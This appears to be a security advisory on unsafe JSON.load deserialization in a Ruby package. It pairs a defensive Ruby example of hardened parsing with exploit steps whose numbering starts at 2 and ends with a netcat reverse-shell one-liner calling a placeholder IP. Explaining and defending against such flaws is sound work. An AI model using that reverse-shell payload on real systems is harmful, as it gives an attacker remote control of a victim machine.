Affected versions of this package are vulnerable to Deserialization of Untrusted Data due to the usage of JSON.load, which is considered unsafe when used with untrusted input.
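The difference between the unsafe call and a hardened parse, as an added example (not code from the advisory or from the affected package). The AuditProbe class, the UNTRUSTED sample and the three function names are hypothetical and constructed for illustration; create_additions is passed explicitly because the default of JSON.load differs between json gem versions.

```ruby
require 'json'

# Hypothetical probe class (constructed for this example). Its json_create
# hook only records that the parser invoked it; in a real application any
# loaded class with such a hook is reachable from attacker-supplied JSON.
class AuditProbe
  @created = 0
  class << self
    attr_reader :created

    def json_create(_attrs)
      @created += 1
      new
    end
  end
end

# Constructed untrusted input naming a class through the "json_class" key.
UNTRUSTED = '{"json_class":"AuditProbe","note":"constructed sample"}'

# Unsafe: create_additions is the behaviour JSON.load has historically enabled
# by default. It is passed explicitly here so the result does not depend on the
# installed json gem's defaults.
def load_unsafe(input)
  JSON.load(input, nil, create_additions: true)
end

# Hardened: JSON.parse with additions disabled returns only plain data
# (Hash, Array, String, Numeric, true, false, nil).
def parse_untrusted(input)
  JSON.parse(input, create_additions: false)
end

# Stricter variant: refuse any document that carries the class-selector key at
# any depth, so it cannot reach a later JSON.load call elsewhere in the code.
def parse_untrusted_strict(input)
  data = parse_untrusted(input)
  walk = lambda do |node|
    case node
    when Hash
      raise ArgumentError, "unexpected #{JSON.create_id} key" if node.key?(JSON.create_id)
      node.each_value(&walk)
    when Array
      node.each(&walk)
    end
  end
  walk.call(data)
  data
end
```

With the hardened parse the "json_class" value stays an ordinary string in a Hash, and the strict variant rejects the document outright.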
2. To import the library, start the ‘Interactive Ruby Shell’ with the following command:
irb
3. If you don’t have ‘irb’ installed, use the following command to install it:
gem install irb
4. Pick a desired payload. I have picked one from pentestmonkey:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 'IP' 1234 >/tmp/f